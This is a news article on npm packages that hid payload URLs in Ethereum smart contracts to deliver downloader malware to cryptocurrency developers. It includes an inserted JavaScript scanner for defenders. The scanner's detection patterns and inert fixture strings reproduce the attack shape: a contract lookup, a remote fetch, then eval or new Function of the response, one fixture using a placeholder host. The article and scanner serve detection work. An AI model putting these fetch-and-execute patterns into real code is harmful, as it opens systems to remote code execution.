Thu Sep 04 10:40:00 UTC 2025

## Malicious npm Packages Use Ethereum Smart Contracts to Hide Malware
**Cybersecurity researchers have uncovered a new tactic employed by threat actors: using Ethereum smart contracts to conceal malicious commands within npm packages.** Two newly discovered packages on the npm registry leveraged this technique to install downloader malware on compromised systems, highlighting the evolving methods used to distribute malware while avoiding detection.
ReversingLabs researcher Lucija Valentić revealed that the packages, named colortoolsv2 and colorsv2, were uploaded in July 2025 and are no longer available. They contained malicious code that fetched and executed a secondary payload from an attacker-controlled server. What sets this apart is the use of Ethereum smart contracts to store the URLs hosting the payload, a method similar to “EtherHiding.” This indicates a shift towards more sophisticated techniques to bypass traditional security measures.
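The chain described above (a contract read that yields a URL, a remote fetch, then dynamic execution of the response) leaves a recognisable footprint in package source, so it can be triaged statically before a dependency is installed. What follows is an added example, not code from ReversingLabs or from the packages discussed: a small heuristic scanner over an npm package's JavaScript files. The pattern lists, risk tiers, file names and fixture contents are all assumptions constructed for illustration; the fixtures are inert strings that are matched, never executed.

```javascript
// Added example: heuristic triage of npm package sources for the
// "contract read -> remote fetch -> dynamic execution" shape.
// Pattern lists and risk tiers are illustrative assumptions, not a vetted ruleset.

const ETH_PATTERNS = [
  /\bethers\b/,         // ethers.js client library
  /\bweb3\b/,           // web3.js client library
  /JsonRpcProvider/,    // direct JSON-RPC provider construction
  /\beth_call\b/,       // raw contract read over JSON-RPC
  /\bContract\s*\(/,    // contract object instantiation
];
const FETCH_PATTERNS = [
  /\bfetch\s*\(/,
  /\bhttps?\.get\s*\(/,
  /\baxios\b/,
  /\brequest\s*\(/,
];
const EXEC_PATTERNS = [
  /\beval\s*\(/,
  /new\s+Function\s*\(/,
  /child_process/,
  /\b(?:exec|execSync|spawn|spawnSync)\s*\(/,
];

// Reports which pattern families hit in one source file plus a coarse risk level.
// "high": all three ingredients present (the chain the article describes).
// "medium": dynamic execution plus either a chain read or a network fetch.
// "low": anything else, including exec-only utility code.
function classifySource(src) {
  const hits = (pats) => pats.filter((p) => p.test(src)).map((p) => p.source);
  const eth = hits(ETH_PATTERNS);
  const net = hits(FETCH_PATTERNS);
  const exec = hits(EXEC_PATTERNS);
  let risk = 'low';
  if (eth.length && net.length && exec.length) risk = 'high';
  else if (exec.length && (eth.length || net.length)) risk = 'medium';
  return { risk, eth, net, exec };
}

// Scans a map of { relativePath: sourceText } (e.g. read from an unpacked
// tarball) and returns non-low findings, highest risk first.
function scanPackage(files) {
  const order = { high: 0, medium: 1, low: 2 };
  return Object.entries(files)
    .map(([path, src]) => ({ path, ...classifySource(src) }))
    .filter((r) => r.risk !== 'low')
    .sort((a, b) => order[a.risk] - order[b.risk]);
}

// Constructed fixtures (assumed file names; not real package contents).
// They are plain strings used only as scanner input. The first mimics the
// shape described in the article with a placeholder address and no payload.
const FIXTURES = {
  'lib/loader.js': `
    const { ethers } = require("ethers");
    const https = require("https");
    const c = new ethers.Contract("0xPLACEHOLDER", ABI, provider);
    c.getConfig().then((url) => https.get(url, (res) => {
      let b = ""; res.on("data", (d) => b += d); res.on("end", () => eval(b));
    }));
  `,
  'lib/plugin.js': `
    async function loadPlugin(name) {
      const src = await (await fetch("https://plugins.example.invalid/" + name)).text();
      return new Function(src)();
    }
  `,
  'lib/balance.js': `
    const { ethers } = require("ethers");
    async function balance(addr) { return provider.getBalance(addr); }
  `,
  'lib/util.js': `
    const { execSync } = require("child_process");
    module.exports = () => execSync("git rev-parse HEAD").toString();
  `,
};

console.log(JSON.stringify(scanPackage(FIXTURES), null, 2));
```

On the constructed fixtures the scanner reports `lib/loader.js` as high and `lib/plugin.js` as medium, while the balance reader (chain access only) and the git helper (child_process only) stay low. The point of the three-tier scoring is to keep ordinary blockchain client code and ordinary build tooling out of the queue, and to surface files only where a remote source is combined with runtime code execution; a hit is a prompt for manual review of the package and its maintainers, not a verdict.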
The malicious packages were part of a larger campaign impacting both npm and GitHub. Attackers created seemingly legitimate GitHub projects to import the packages, tricking developers into downloading and running them. Further investigation revealed a network of GitHub repositories, posing as cryptocurrency trading bots, referencing the malicious packages. These repositories are believed to be part of a “distribution-as-service” (DaaS) offering called Stargazers Ghost Network, a network of fake GitHub accounts used to artificially inflate the popularity of malicious repositories.
The target of this campaign appears to be cryptocurrency developers and users, as the malicious repositories are designed to lure them in with promises of automated trading solutions. Researchers warn developers to be vigilant when selecting open-source libraries, emphasizing the need to thoroughly assess both the package and its maintainers. This includes looking beyond metrics such as downloads and commits to verify the legitimacy of the package and the developers behind it.